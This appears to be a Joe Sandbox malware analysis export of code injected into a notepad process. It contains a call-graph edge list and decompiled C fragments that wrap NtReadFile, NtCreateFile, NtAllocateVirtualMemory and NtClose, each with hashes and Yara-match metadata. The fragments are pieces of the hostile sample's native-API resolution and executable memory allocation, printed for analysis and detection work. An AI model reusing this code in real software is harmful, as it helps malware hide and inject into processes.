64434->64435 64436 41b66b 64435->64436 64437 4160c0 LdrLoadDll 64436->64437 64438 41b71f 64436->64438 64437->64438 64438->64333 64438->64438 64439->64411 64440->64198 64442 41b9b0 LdrLoadDll 64441->64442 64443 41b06c RtlFreeHeap 64442->64443 64443->64202 64445 4072b0 64444->64445 64446 4072ab 64444->64446 64447 41c8c0 2 API calls 64445->64447 64446->64120 64450 4072d5 64447->64450 64448 407338 64448->64120 64449 41a8a0 2 API calls 64449->64450 64450->64448 64450->64449 64451 40733e 64450->64451 64455 41c8c0 2 API calls 64450->64455 64460 41afa0 64450->64460 64453 407364 64451->64453 64454 41afa0 2 API calls 64451->64454 64453->64120 64456 407355 64454->64456 64455->64450 64456->64120 64458 40757e 64457->64458 64459 41afa0 2 API calls 64457->64459 64458->64081 64459->64458 64461 41b9b0 LdrLoadDll 64460->64461 64462 41afbc 64461->64462 64465 b0fb68 LdrInitializeThunk 64462->64465 64463 41afd3 64463->64450 64465->64463 64467 41c073 64466->64467 64470 40ac60 64467->64470 64471 40ac84 64470->64471 64472 40acc0 LdrLoadDll 64471->64472 64473 409bba 64471->64473 64472->64473 64473->64087 64476 40afd3 64474->64476 64475 40b050 64475->64094 64476->64475 64489 41a670 LdrLoadDll 64476->64489 64479 41b9b0 LdrLoadDll 64478->64479 64480 40dc3b 64479->64480 64480->64097 64481 41b1b0 64480->64481 64482 41b1cf LookupPrivilegeValueW 64481->64482 64483 41b9b0 LdrLoadDll 64481->64483 64482->64099 64483->64482 64485 41b9b0 LdrLoadDll 64484->64485 64486 41ac5c 64485->64486 64490 b0fed0 LdrInitializeThunk 64486->64490 64487 41ac7b 64487->64100 64489->64475 64490->64487 64492 40b157 64491->64492 64493 40afb0 LdrLoadDll 64492->64493 64494 40b186 64493->64494 64494->64019 64496 40dd2a 64495->64496 64504 40dde0 64495->64504 64497 40afb0 LdrLoadDll 64496->64497 64498 40dd4c 64497->64498 64505 41a920 64498->64505 64500 40dd8e 64508 41a960 64500->64508 64503 41ae70 2 API calls 64503->64504 64504->64022 64504->64024 64506 41b9b0 LdrLoadDll 64505->64506 64507 41a93c 64505->64507 64506->64507 64507->64500 64509 41b9b0 LdrLoadDll 64508->64509 64510 41a97c 64509->64510 64513 b107ac LdrInitializeThunk 64510->64513 64511 40ddd4 64511->64503 64513->64511 64515 40adc1 64514->64515 64516 40adbd 64514->64516 64517 40adda 64515->64517 64518 40ae0c 64515->64518 64516->64039 64573 41a6b0 LdrLoadDll 64517->64573 64574 41a6b0 LdrLoadDll 64518->64574 64520 40ae1d 64520->64039 64522 40adfc 64522->64039 64524 40ded0 3 API calls 64523->64524 64525 415606 64524->64525 64525->64041 64575 4080d0 64526->64575 64528 4080ba 64528->64043 64529 407ede 64529->64528 64530 4072a0 4 API calls 64529->64530 64532 407fbc 64529->64532 64537 407f1c 64530->64537 64531 40809c 64531->64528 64622 40e140 10 API calls 64531->64622 64532->64528 64532->64531 64533 4072a0 4 API calls 64532->64533 64541 407ff9 64533->64541 64535 4080b0 64535->64043 64537->64532 64538 407fb2 64537->64538 64589 407ba0 64537->64589 64539 407560 2 API calls 64538->64539 64539->64532 64540 407ba0 17 API calls 64540->64541 64541->64531 64541->64540 64542 408092 64541->64542 64543 407560 2 API calls 64542->64543 64543->64531 64545 41aef6 64544->64545 64546 41b9b0 LdrLoadDll 64545->64546 64547 41aefc 64546->64547 64760 b0fea0 LdrInitializeThunk 64547->64760 64548 40bbe2 64550 40ded0 64548->64550 64551 40deed 64550->64551 64761 41a9a0 64551->64761 64554 40df35 64554->64047 64555 41a9f0 2 API calls 64556 40df5e 64555->64556 64556->64047 64558 41a9f6 64557->64558 64559 41b9b0 LdrLoadDll 64558->64559 64560 41aa0c 64559->64560 64767 b0fc60 LdrInitializeThunk 64560->64767 64561 40bc45 64561->64053 64561->64056 64564 41b9b0 LdrLoadDll 64563->64564 64565 41aa5c 64564->64565 64768 b0fc90 LdrInitializeThunk 64565->64768 64566 40bd19 64566->64064 64569 41b9b0 LdrLoadDll 64568->64569 64570 41a81c 64569->64570 64769 b10078 LdrInitializeThunk 64570->64769 64571 40bd6c 64571->64068 64573->64522 64574->64520 64576 4080f7 64575->64576 64577 4072a0 4 API calls 64576->64577 64584 40834c 64576->64584 64578 40814a 64577->64578 64579 407560 2 API calls 64578->64579 64578->64584 64580 4081d9 64579->64580 64581 4072a0 4 API calls 64580->64581 64580->64584 64582 4081ee 64581->64582 64583 407560 2 API calls 64582->64583 64582->64584 64586 40824e 64583->64586 64584->64529 64585 4072a0 4 API calls 64585->64586 64586->64584 64586->64585 64587 407ba0 17 API calls 64586->64587 64588 407560 2 API calls 64586->64588 64587->64586 64588->64586 64590 407bc5 64589->64590 64623 41a6f0 64590->64623 64593 407c19 64593->64537 64594 407c9a 64658 40e020 LdrLoadDll NtClose 64594->64658 64595 41a8e0 2 API calls 64596 407c3d 64595->64596 64596->64594 64597 407c48 64596->64597 64599 407cc6 64597->64599 64626 40bd80 64597->64626 64599->64537 64600 407cb5 64602 407cd2 64600->64602 64603 407cbc 64600->64603 64659 41a770 LdrLoadDll 64602->64659 64605 41ae70 2 API calls 64603->64605 64604 407c62 64604->64599 64646 4079d0 64604->64646 64605->64599 64607 407cfd 64609 40bd80 5 API calls 64607->64609 64611 407d1d 64609->64611 64611->64599 64660 41a7a0 LdrLoadDll 64611->64660 64613 407d42 64661 41a830 LdrLoadDll 64613->64661 64615 407d5c 64616 41a800 2 API calls 64615->64616 64617 407d6b 64616->64617 64618 41ae70 2 API calls 64617->64618 64619 407d75 64618->64619 64662 4077a0 64619->64662 64621 407d89 64621->64537 64622->64535 64624 407c0f 64623->64624 64625 41b9b0 LdrLoadDll 64623->64625 64624->64593 64624->64594 64624->64595 64625->64624 64628 40bdab 64626->64628 64627 40ded0 3 API calls 64629 40be0a 64627->64629 64628->64627 64630 40be53 64629->64630 64631 41a9f0 2 API calls 64629->64631 64630->64604 64632 40be35 64631->64632 64633 40be3c 64632->64633 64636 40be5f 64632->64636 64634 41aa40 2 API calls 64633->64634 64635 40be49 64634->64635 64637 41ae70 2 API calls 64635->64637 64638 40bec9 64636->64638 64639 40bea9 64636->64639 64637->64630 64641 41aa40 2 API calls 64638->64641 64640 41ae70 2 API calls 64639->64640 64642 40beb6 64640->64642 64643 40bedb 64641->64643 64642->64604 64644 41ae70 2 API calls 64643->64644 64645 40bee5 64644->64645 64645->64604 64647 4079e6 64646->64647 64678 41a210 64647->64678 64649 407b71 64649->64537 64650 4079ff 64650->64649 64699 4075a0 64650->64699 64652 407ae5 64652->64649 64653 4077a0 11 API calls 64652->64653 64654 407b13 64653->64654 64654->64649 64655 41a8e0 2 API calls 64654->64655 64656 407b48 64655->64656 64656->64649 64657 41aee0 2 API calls 64656->64657 64657->64649 64658->64600 64659->64607 64660->64613 64661->64615 64663 4077c9 64662->64663 64739 407710 64663->64739 64666 41aee0 2 API calls 64667 4077dc 64666->64667 64667->64666 64668 407867 64667->64668 64671 407862 64667->64671 64747 40e0a0 64667->64747 64668->64621 64669 41ae70 2 API calls 64670 40789a 64669->64670 64670->64668 64672 41a6f0 LdrLoadDll 64670->64672 64671->64669 64673 4078ff 64672->64673 64673->64668 64751 41a730 64673->64751 64675 407963 64675->64668 64676 415cb0 8 API calls 64675->64676 64677 4079b8 64676->64677 64677->64621 64679 41cb10 2 API calls 64678->64679 64680 41a227 64679->64680 64706 4092e0 64680->64706 64682 41a242 64683 41a263 64682->64683 64684 41a277 64682->64684 64685 41c940 2 API calls 64683->64685 64687 41c8c0 2 API calls 64684->64687 64686 41a26d 64685->64686 64686->64650 64688 41a2de 64687->64688 64689 41c8c0 2 API calls 64688->64689 64691 41a2f7 64689->64691 64696 41a5c7 64691->64696 64712 41c900 64691->64712 64693 41a5b3 64694 41c940 2 API calls 64693->64694 64695 41a5bd 64694->64695 64695->64650 64697 41c940 2 API calls 64696->64697 64698 41a61c 64697->64698 64698->64650 64700 40769f 64699->64700 64701 4075b5 64699->64701 64700->64652 64701->64700 64702 415cb0 8 API calls 64701->64702 64703 407622 64702->64703 64704 41c940 2 API calls 64703->64704 64705 407649 64703->64705 64704->64705 64705->64652 64707 409305 64706->64707 64708 40ac60 LdrLoadDll 64707->64708 64709 409338 64708->64709 64710 40935d 64709->64710 64715 40c7b0 64709->64715 64710->64682 64733 41af60 64712->64733 64716 40c7dc 64715->64716 64717 41abc0 LdrLoadDll 64716->64717 64718 40c7f5 64717->64718 64719 40c7fc 64718->64719 64726 41ac00 64718->64726 64719->64710 64723 40c837 64724 41ae70 2 API calls 64723->64724 64725 40c85a 64724->64725 64725->64710 64727 41ac1c 64726->64727 64728 41b9b0 LdrLoadDll 64726->64728 64732 b0fbb8 LdrInitializeThunk 64727->64732 64728->64727 64729 40c81f 64729->64719 64731 41b1f0 LdrLoadDll 64729->64731 64731->64723 64732->64729 64734 41b9b0 LdrLoadDll 64733->64734 64735 41af7c 64734->64735 64738 b10048 LdrInitializeThunk 64735->64738 64736 41a5ac 64736->64693 64736->64696 64738->64736 64740 407728 64739->64740 64741 40ac60 LdrLoadDll 64740->64741 64742 407743 64741->64742 64743 4160c0 LdrLoadDll 64742->64743 64744 407753 64743->64744 64745 407766 PostThreadMessageW 64744->64745 64746 407770 64744->64746 64745->64746 64746->64667 64748 40e0b3 64747->64748 64754 41a870 64748->64754 64752 41a74c 64751->64752 64753 41b9b0 LdrLoadDll 64751->64753 64752->64675 64753->64752 64755 41a88c 64754->64755 64756 41b9b0 LdrLoadDll 64754->64756 64759 b0fd8c LdrInitializeThunk 64755->64759 64756->64755 64757 40e0de 64757->64667 64759->64757 64760->64548 64762 41a9bc 64761->64762 64763 41b9b0 LdrLoadDll 64761->64763 64766 b0ffb4 LdrInitializeThunk 64762->64766 64763->64762 64764 40df2e 64764->64554 64764->64555 64766->64764 64767->64561 64768->64566 64769->64571

                                                    Executed Functions

                                                    Function 0041ADF0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 0 41adf0-41ae39 call 41b9b0 NtReadFile
                                                    C-Code - Quality: 37%
                                                    			E0041ADF0(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				intOrPtr* _t27;

				_t13 = _a4;
				_t27 = _a4 + 0xc6c;
				E0041B9B0( *((intOrPtr*)(_t13 + 0x14)), _t13, _t27,  *((intOrPtr*)(_t13 + 0x14)), 0, 0x2a);
				_t6 =  &_a32; // 0x415fe0
				_t12 =  &_a8; // 0x415fe0
				_t18 =  *((intOrPtr*)( *_t27))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}





                                                    0x0041adf3
                                                    0x0041adff
                                                    0x0041ae07
                                                    0x0041ae12
                                                    0x0041ae2d
                                                    0x0041ae35
                                                    0x0041ae39

                                                    APIs
                                                    • NtReadFile.NTDLL(_A,004112B8,FFFFFFFF,00415ACA,?,?,_A,?,00415ACA,FFFFFFFF,004112B8,00415FE0,?,00000000), ref: 0041AE35
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID: _A$_A
                                                    • API String ID: 2738559852-4113603176
                                                    • Opcode ID: 8b2641afd4992059007ae0332a24cf2034ac5fc3712eec955c9c09407593ca19
                                                    • Instruction ID: 9b73d0bb524ae2008c0040566ba0b2cc5ee1c7afffee4fb23630f66280de0acd
                                                    • Opcode Fuzzy Hash: 8b2641afd4992059007ae0332a24cf2034ac5fc3712eec955c9c09407593ca19
                                                    • Instruction Fuzzy Hash: 3FF0A4B2210108ABCB14DF89DC85EEB77ADEF8C754F118249BA4D97241D630E811CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041AD3A Relevance: 1.5, APIs: 1, Instructions: 41filenativeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 265 41ad3a-41ad56 266 41ad5c-41ad91 NtCreateFile 265->266 267 41ad57 call 41b9b0 265->267 267->266
                                                    C-Code - Quality: 79%
                                                    			E0041AD3A(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t22;

				asm("adc dl, [ebp-0x75]");
				_t16 = _a4;
				_t3 = _t16 + 0xc64; // 0xc64
				E0041B9B0( *((intOrPtr*)(_a4 + 0x14)), _t16, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x28);
				_t22 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t22;
			}




                                                    0x0041ad3f
                                                    0x0041ad43
                                                    0x0041ad4f
                                                    0x0041ad57
                                                    0x0041ad8d
                                                    0x0041ad91

                                                    APIs
                                                    • NtCreateFile.NTDLL(00000060,00409C63,?,00415E1C,00409C63,FFFFFFFF,?,?,FFFFFFFF,00409C63,00415E1C,?,00409C63,00000060,00000000,00000000), ref: 0041AD8D
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: a84c44586c6b92055e6199a7c268357859d7d6940ef359063de5626f1e28ee88
                                                    • Instruction ID: 7f79384ac8252130d8a4ccf3353a55d2ab66ad2f0bb608739f4b145add724747
                                                    • Opcode Fuzzy Hash: a84c44586c6b92055e6199a7c268357859d7d6940ef359063de5626f1e28ee88
                                                    • Instruction Fuzzy Hash: EA01B6B2211108AFCB58CF99DD95DDB37A9EF8C354F158248FA4DE7241C634E851CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041AD40 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 268 41ad40-41ad91 call 41b9b0 NtCreateFile
                                                    C-Code - Quality: 100%
                                                    			E0041AD40(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;

				_t3 = _a4 + 0xc64; // 0xc64
				E0041B9B0( *((intOrPtr*)(_a4 + 0x14)), _t15, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}




                                                    0x0041ad4f
                                                    0x0041ad57
                                                    0x0041ad8d
                                                    0x0041ad91

                                                    APIs
                                                    • NtCreateFile.NTDLL(00000060,00409C63,?,00415E1C,00409C63,FFFFFFFF,?,?,FFFFFFFF,00409C63,00415E1C,?,00409C63,00000060,00000000,00000000), ref: 0041AD8D
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: a7aa8badec4095c914b2940b07876bf3970e40effb07566943172ffd39e61dea
                                                    • Instruction ID: 266fac26e5f6b77c20c7c3866c70db339a011befb51e61fde83e4fde5762e25e
                                                    • Opcode Fuzzy Hash: a7aa8badec4095c914b2940b07876bf3970e40effb07566943172ffd39e61dea
                                                    • Instruction Fuzzy Hash: D5F0B2B2210208ABCB08CF89DC85EDB37ADAF8C754F018208BA0997241C630E851CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041AF1A Relevance: 1.5, APIs: 1, Instructions: 32memorynativeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 277 41af1a-41af5d call 41b9b0 NtAllocateVirtualMemory
                                                    C-Code - Quality: 68%
                                                    			E0041AF1A(void* __ebx, void* __ecx, void* __edi, void* _a4, PVOID* _a8, long _a12, long* _a16, long _a20, long _a24) {
				intOrPtr _v0;
				long _t16;

				asm("stosd");
				asm("sahf");
				 *((intOrPtr*)(__edi - 0x1374aa8d)) =  *((intOrPtr*)(__edi - 0x1374aa8d)) + __ecx;
				_t12 = _v0;
				_t5 = _t12 + 0xc84; // 0x3c84
				E0041B9B0( *((intOrPtr*)(_v0 + 0x14)), _t12, _t5,  *((intOrPtr*)(_v0 + 0x14)), 0, 0x30);
				_t16 = NtAllocateVirtualMemory(_a4, _a8, _a12, _a16, _a20, _a24); // executed
				return _t16;
			}





                                                    0x0041af1b
                                                    0x0041af1c
                                                    0x0041af1d
                                                    0x0041af23
                                                    0x0041af2f
                                                    0x0041af37
                                                    0x0041af59
                                                    0x0041af5d

                                                    APIs
                                                    • NtAllocateVirtualMemory.NTDLL(?,00000000,?,0041BBED,?,0041BBED,?,00000000,?,00003000,00000040,00409C63,00000000), ref: 0041AF59
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateMemoryVirtual
                                                    • String ID:
                                                    • API String ID: 2167126740-0
                                                    • Opcode ID: 5f9f3f2602ee0c3e710593ffe4983b521bbf291823e6337950a3e9ccbae6f77d
                                                    • Instruction ID: 38ff08d943a92b2f5ed9712c74b7e3c40056e9063af96344001ae54088884a6d
                                                    • Opcode Fuzzy Hash: 5f9f3f2602ee0c3e710593ffe4983b521bbf291823e6337950a3e9ccbae6f77d
                                                    • Instruction Fuzzy Hash: 6FF0F8B5200219ABDB18DF99DC81E9B77ADEF8C354F018259BA0997241C630E811CBB4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041AF20 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 280 41af20-41af36 281 41af3c-41af5d NtAllocateVirtualMemory 280->281 282 41af37 call 41b9b0 280->282 282->281
                                                    C-Code - Quality: 100%
                                                    			E0041AF20(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;

				_t3 = _a4 + 0xc84; // 0x3c84
				E0041B9B0( *((intOrPtr*)(_a4 + 0x14)), _t10, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}




                                                    0x0041af2f
                                                    0x0041af37
                                                    0x0041af59
                                                    0x0041af5d

                                                    APIs
                                                    • NtAllocateVirtualMemory.NTDLL(?,00000000,?,0041BBED,?,0041BBED,?,00000000,?,00003000,00000040,00409C63,00000000), ref: 0041AF59
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateMemoryVirtual
                                                    • String ID:
                                                    • API String ID: 2167126740-0
                                                    • Opcode ID: a33f675ee626bb7b9b22684e476a5830a3283a9077953d9b243d4b27987ee3c2
                                                    • Instruction ID: 6f5e986479cc3908d889538428cc217ae1d986c0f07698dd23623d9a68b12c7a
                                                    • Opcode Fuzzy Hash: a33f675ee626bb7b9b22684e476a5830a3283a9077953d9b243d4b27987ee3c2
                                                    • Instruction Fuzzy Hash: 32F0F2B2210208ABCB18DF89DC81EAB77ADAF88654F018109BA0897241CA30E8118BE4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041AE6A Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E0041AE6A(void* __eax, intOrPtr _a4, void* _a8) {
				long _t11;

				_t8 = _a4;
				_t4 = _t8 + 0x14; // 0x56c29f0f
				_t5 = _t8 + 0xc74; // 0x40a8d7
				E0041B9B0( *_t4, _a4, _t5,  *_t4, 0, 0x2c);
				_t11 = NtClose(_a8); // executed
				return _t11;
			}




                                                    0x0041ae73
                                                    0x0041ae76
                                                    0x0041ae7f
                                                    0x0041ae87
                                                    0x0041ae95
                                                    0x0041ae99

                                                    APIs
                                                    • NtClose.NTDLL(00415FBE,?,?,00415FBE,00409C63,FFFFFFFF), ref: 0041AE95
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID:
                                                    • API String ID: 3535843008-0
                                                    • Opcode ID: 717748b76bd646d9a371b26f9814808e1180e98c2cbc0e64419c4f3987fdc23a
                                                    • Instruction ID: 1c828a904c385d8a0aff37bf428e4edd8597b2182cbb98ccf3f296e8e674625b
                                                    • Opcode Fuzzy Hash: 717748b76bd646d9a371b26f9814808e1180e98c2cbc0e64419c4f3987fdc23a
                                                    • Instruction Fuzzy Hash: 1BE0C2712002046FD610EFA5CC49FC73B68DF48750F004455BE0C9B742CA30EA008BE0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041AE70 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E0041AE70(intOrPtr _a4, void* _a8) {
				long _t8;

				_t5 = _a4;
				_t2 = _t5 + 0x14; // 0x56c29f0f
				_t3 = _t5 + 0xc74; // 0x40a8d7
				E0041B9B0( *_t2, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}




                                                    0x0041ae73
                                                    0x0041ae76
                                                    0x0041ae7f
                                                    0x0041ae87
                                                    0x0041ae95
                                                    0x0041ae99

                                                    APIs
                                                    • NtClose.NTDLL(00415FBE,?,?,00415FBE,00409C63,FFFFFFFF), ref: 0041AE95
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID:
                                                    • API String ID: 3535843008-0
                                                    • Opcode ID: 2ef1dc4ab05b91dc299c7f1afad97524dcd564c6ceaa00152f65cec0fd43af9d
                                                    • Instruction ID: c38d3d50f8ec0f29125cfe1bdcc2e0d0407bf39179b1731fc0727421f36e34e1
                                                    • Opcode Fuzzy Hash: 2ef1dc4ab05b91dc299c7f1afad97524dcd564c6ceaa00152f65cec0fd43af9d
                                                    • Instruction Fuzzy Hash: ECD01772210218ABD614EBA9DC89ED77BACDF48660F014155BA4C5B242CA30FA008BE4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B100C4 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                    • Associated: 00000009.00000002.1040420400.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041429100.0000000000BE0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041475672.0000000000BF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041557208.0000000000BF4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041650076.0000000000BF7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041688859.0000000000C00000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1042103449.0000000000C60000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_af0000_notepad.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                    • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                    • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                    • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B10078 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                    • Associated: 00000009.00000002.1040420400.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041429100.0000000000BE0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041475672.0000000000BF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041557208.0000000000BF4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041650076.0000000000BF7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041688859.0000000000C00000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1042103449.0000000000C60000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_af0000_notepad.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                    • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                                    • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                    • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B10048 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                    • Associated: 00000009.00000002.1040420400.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041429100.0000000000BE0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041475672.0000000000BF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041557208.0000000000BF4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041650076.0000000000BF7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041688859.0000000000C00000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1042103449.0000000000C60000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_af0000_notepad.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                    • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                                    • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                    • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

